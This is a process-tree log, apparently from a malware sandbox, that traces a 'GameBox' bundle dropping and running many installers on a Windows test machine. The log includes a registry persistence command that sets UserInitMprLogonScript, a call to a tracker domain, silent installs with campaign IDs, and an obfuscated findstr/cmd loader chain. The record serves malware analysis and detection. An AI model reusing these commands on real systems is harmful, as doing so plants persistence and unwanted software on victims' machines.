C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-99M73.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
PID:440
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:1448
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵PID:6900
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72110⤵
- Adds Run key to start application
- Enumerates system info in registry
PID:6068 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffeeffc46f8,0x7ffeeffc4708,0x7ffeeffc471811⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:211⤵PID:5772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:311⤵PID:2772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:811⤵PID:4080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:111⤵PID:3140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:111⤵PID:2824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:111⤵PID:3152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:111⤵PID:6088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:111⤵PID:6604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:811⤵PID:6564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:811⤵PID:5916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5736 /prefetch:811⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:111⤵PID:1312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:111⤵PID:6484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:111⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:2960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2528 /prefetch:111⤵PID:2732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:111⤵PID:1752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:111⤵PID:4528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,16229381920243912550,13225007737993826164,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6284 /prefetch:211⤵PID:5652
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-99M73.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-99M73.tmp\{app}\vdi_compiler"9⤵PID:3960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 29210⤵
- Program crash
PID:2360
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵
- Loads dropped DLL
PID:1836
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"5⤵
- Executes dropped EXE
PID:1624 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 2966⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5196
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\is-8A9BE.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-8A9BE.tmp\WEATHER Manager.tmp" /SL5="$1036C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵PID:2144
-
C:\Users\Admin\AppData\Local\Temp\is-6KPRF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6KPRF.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6660 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-6KPRF.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-6KPRF.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629316236 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:6840
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
PID:4912 -
C:\Users\Admin\AppData\Local\Temp\is-L5DUM.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-L5DUM.tmp\VPN.tmp" /SL5="$10370,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
- Executes dropped EXE
PID:2288 -
C:\Users\Admin\AppData\Local\Temp\is-FMCTL.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-FMCTL.tmp\Setup.exe" /silent /subid=7207⤵
- Suspicious use of SetThreadContext
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\is-O2PIM.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-O2PIM.tmp\Setup.tmp" /SL5="$403F2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-FMCTL.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6984 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:5964
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵
- Checks SCSI registry key(s)
PID:5320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:4092
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵PID:2960
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵PID:504
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3992
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
PID:5124 -
C:\Users\Admin\AppData\Local\Temp\is-RDSGU.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-RDSGU.tmp\MediaBurner2.tmp" /SL5="$20412,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\is-FB365.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-FB365.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:1504 -
C:\Program Files\Windows Defender\RYDCRNPQIV\ultramediaburner.exe"C:\Program Files\Windows Defender\RYDCRNPQIV\ultramediaburner.exe" /VERYSILENT8⤵PID:4288
-
C:\Users\Admin\AppData\Local\Temp\is-9DEM5.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-9DEM5.tmp\ultramediaburner.tmp" /SL5="$401FC,281924,62464,C:\Program Files\Windows Defender\RYDCRNPQIV\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
PID:2812 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:6600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\b3-8d80c-1f6-e8ca2-34db353bdeb52\Kodugerajy.exe"C:\Users\Admin\AppData\Local\Temp\b3-8d80c-1f6-e8ca2-34db353bdeb52\Kodugerajy.exe"8⤵PID:6832
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:5824
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1ec,0x1f0,0x1f4,0x1c8,0x1f8,0x7ffeeffc46f8,0x7ffeeffc4708,0x7ffeeffc471810⤵PID:2716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c5-e109e-8b9-3c18d-8e2611b60122c\Saejiwipilae.exe"C:\Users\Admin\AppData\Local\Temp\c5-e109e-8b9-3c18d-8e2611b60122c\Saejiwipilae.exe"8⤵PID:476
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1cjxf21y.xv2\GcleanerEU.exe /eufive & exit9⤵PID:6132
-
C:\Users\Admin\AppData\Local\Temp\1cjxf21y.xv2\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\1cjxf21y.xv2\GcleanerEU.exe /eufive10⤵PID:4072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 29211⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2360
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\edjbomjj.qjc\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:5556
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:504
-
-
C:\Users\Admin\AppData\Local\Temp\edjbomjj.qjc\installer.exeC:\Users\Admin\AppData\Local\Temp\edjbomjj.qjc\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
PID:804 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\edjbomjj.qjc\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\edjbomjj.qjc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629316236 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:5132
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ycrhl55n.anu\ufgaa.exe & exit9⤵PID:1728
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x01dmlc3.g2v\anyname.exe & exit9⤵PID:668
-
C:\Users\Admin\AppData\Local\Temp\x01dmlc3.g2v\anyname.exeC:\Users\Admin\AppData\Local\Temp\x01dmlc3.g2v\anyname.exe10⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\x01dmlc3.g2v\anyname.exe"C:\Users\Admin\AppData\Local\Temp\x01dmlc3.g2v\anyname.exe" -q11⤵
- Suspicious use of SendNotifyMessage
PID:5976 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 83212⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 90012⤵
- Program crash
PID:3880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 87212⤵
- Program crash
PID:3268
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksfex4n0.ujc\gcleaner.exe /mixfive & exit9⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\ksfex4n0.ujc\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ksfex4n0.ujc\gcleaner.exe /mixfive10⤵PID:6072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 28811⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6256
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iubmtca1.zpo\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:5660
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵PID:1232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 18566⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6812
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Executes dropped EXE
PID:5300 -
C:\Users\Admin\AppData\Roaming\4493945.exe"C:\Users\Admin\AppData\Roaming\4493945.exe"6⤵
- Executes dropped EXE
PID:5336 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5336 -s 23247⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1128
-
-
-
C:\Users\Admin\AppData\Roaming\2993625.exe"C:\Users\Admin\AppData\Roaming\2993625.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:3448
-
-
C:\Users\Admin\AppData\Roaming\2688278.exe"C:\Users\Admin\AppData\Roaming\2688278.exe"6⤵
- Executes dropped EXE
PID:244
-
-
C:\Users\Admin\AppData\Roaming\8542521.exe"C:\Users\Admin\AppData\Roaming\8542521.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1176 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 24287⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6244
-
-
-
C:\Users\Admin\AppData\Roaming\5951013.exe"C:\Users\Admin\AppData\Roaming\5951013.exe"6⤵
- Executes dropped EXE
PID:6040
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
- Executes dropped EXE
PID:5408 -
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
PID:6136 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 6887⤵
- Program crash
PID:2776
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
PID:5528 -
C:\Users\Admin\AppData\Local\Temp\tmp7BA9_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp7BA9_tmp.exe"6⤵PID:6720
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵PID:6820
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵PID:5704
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:6132
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵PID:5700
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
- Suspicious use of SendNotifyMessage
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Suspicious use of SendNotifyMessage
PID:5996 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
- Suspicious use of SendNotifyMessage
PID:4660 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
- Suspicious use of SendNotifyMessage
PID:3428 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
- Suspicious use of SendNotifyMessage
PID:5904 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Suspicious use of SendNotifyMessage
PID:228 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
- Suspicious use of SendNotifyMessage
PID:3780 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵PID:1580
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
- Suspicious use of SendNotifyMessage
PID:6572 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
- Suspicious use of SendNotifyMessage
PID:5960 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵PID:6796
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
- Suspicious use of SendNotifyMessage
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
- Suspicious use of SendNotifyMessage
PID:3840 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
- Suspicious use of SendNotifyMessage
PID:2716 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2288 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
- Suspicious use of SendNotifyMessage
PID:5720 -
